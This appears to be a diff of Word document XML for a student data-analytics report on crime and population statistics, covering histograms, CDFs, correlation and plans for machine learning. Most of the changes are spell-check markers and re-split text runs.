                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8764,6 +9210,7 @@
                               </w:rPr>
                               <w:t>describe</w:t>
                             </w:r>
+                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8904,6 +9351,7 @@
                         </w:rPr>
                         <w:t xml:space="preserve">From this </w:t>
                       </w:r>
+                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8920,6 +9368,7 @@
                         </w:rPr>
                         <w:t>describe</w:t>
                       </w:r>
+                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -9113,6 +9562,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Histograms provide a visual representation of the distribution of </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9143,7 +9593,24 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9291,38 +9758,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Figure 05 – histogram of crime_df</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t xml:space="preserve">Figure 05 – histogram of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -9334,8 +9777,37 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9349,14 +9821,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>There are some insights that you can get from the bin plot:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9370,8 +9836,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>There are some insights that you can get from the bin plot:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9385,14 +9857,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9406,8 +9872,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9421,14 +9893,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9442,6 +9908,27 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
+        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -9486,8 +9973,21 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:r>
-        <w:t>Pmf and Cdf are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pmf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Cdf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9523,7 +10023,15 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Before getting the PMF and CDF information, its important to prepare the dataset.</w:t>
+        <w:t xml:space="preserve">Before getting the PMF and CDF information, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> important to prepare the dataset.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9752,8 +10260,21 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pmi</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>pmi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9990,11 +10511,19 @@
         </w:rPr>
         <w:t xml:space="preserve">. This is followed by robbery, </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="HTMLCode"/>
         </w:rPr>
-        <w:t xml:space="preserve">extortion </w:t>
+        <w:t>extortion</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10181,8 +10710,17 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>CDF of crime_df</w:t>
-      </w:r>
+        <w:t xml:space="preserve">CDF of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10217,7 +10755,21 @@
         <w:rPr>
           <w:rStyle w:val="HTMLCode"/>
         </w:rPr>
-        <w:t>The CDF chart shows that the VALUE column is skewed to the right. This means that there is a relatively small number of crimes with very high values, and a large number of crimes with lower values.</w:t>
+        <w:t xml:space="preserve">The CDF chart shows that the VALUE column is skewed to the right. This means that there is a relatively small number of crimes with very high values, and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t>a large number of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> crimes with lower values.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10466,7 +11018,23 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t>We have to consider that the information in the chart is only up to July 2023. This means that it is possible that the crime rates for the year as a whole will be different from the rates shown in the chart.</w:t>
+        <w:t xml:space="preserve">We </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>have to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> consider that the information in the chart is only up to July 2023. This means that it is possible that the crime rates for the year </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>as a whole will</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> be different from the rates shown in the chart.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10547,14 +11115,10 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>To compare population growth and crime rates, we will filter the population dataframe to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:t xml:space="preserve">To compare population growth and crime rates, we will filter the population </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -10568,7 +11132,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
+        <w:t>dataframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10583,7 +11149,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> population by 1000 to account for the fact that the population is shown in thousands and crimes are shown in units.</w:t>
+        <w:t xml:space="preserve"> to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10619,18 +11185,16 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>To compare the evolution of the population and crime rate, a line chart has been plotted.</w:t>
+        <w:t xml:space="preserve"> population by 1000 to account for the fact that the population is shown in thousands and crimes are shown in units.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
         <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10645,11 +11209,49 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>To compare the evolution of the population and crime rate, a line chart has been plotted.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BFBF591" wp14:editId="44EF74E0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BFBF591" wp14:editId="2118C07B">
             <wp:extent cx="5570621" cy="1564028"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="191194753" name="Picture 2" descr="A graph and chart with lines&#10;&#10;Description automatically generated with medium confidence"/>
@@ -10801,8 +11403,28 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> and population growth</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> and population </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>growth</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10958,14 +11580,7 @@
                                 <w:b/>
                                 <w:bCs/>
                               </w:rPr>
-                              <w:t>Insight</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:b/>
-                                <w:bCs/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> from Correlation Heatmap</w:t>
+                              <w:t>Insight from Correlation Heatmap</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -11011,14 +11626,7 @@
                           <w:b/>
                           <w:bCs/>
                         </w:rPr>
-                        <w:t>Insight</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:b/>
-                          <w:bCs/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> from Correlation Heatmap</w:t>
+                        <w:t>Insight from Correlation Heatmap</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -11194,12 +11802,21 @@
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t>For the purpose of developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
+        <w:t>For the purpose of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11216,43 +11833,126 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">These tasks will be performed in the jupyter notebook: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.ipynb</w:t>
+        <w:t xml:space="preserve">I will </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t>use CRISP-DM project management framework,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t>Phase 4 - Machine Learning</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
+        <w:t xml:space="preserve">applying </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>multiple machine learning models</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>examine the performance</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of each model.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">These tasks will be performed in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> notebook: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.ipynb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>Phase 4 - Machine Learning</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -11269,7 +11969,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Handling Outliers</w:t>
       </w:r>
       <w:r>
@@ -11640,7 +12339,15 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>Considering that the dataframe contains 20 rows, removing outliers would eliminate 5 rows. In this scenario, the preferred approach is to transform the data to mitigate skewness rather than removing outliers.</w:t>
+        <w:t xml:space="preserve">Considering that the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dataframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> contains 20 rows, removing outliers would eliminate 5 rows. In this scenario, the preferred approach is to transform the data to mitigate skewness rather than removing outliers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11830,12 +12537,14 @@
                               </w:rPr>
                               <w:t xml:space="preserve">As the result, </w:t>
                             </w:r>
+                            <w:proofErr w:type="spellStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:lang w:val="en-US"/>
                               </w:rPr>
                               <w:t>them</w:t>
                             </w:r>
+                            <w:proofErr w:type="spellEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:lang w:val="en-US"/>
@@ -11929,12 +12638,14 @@
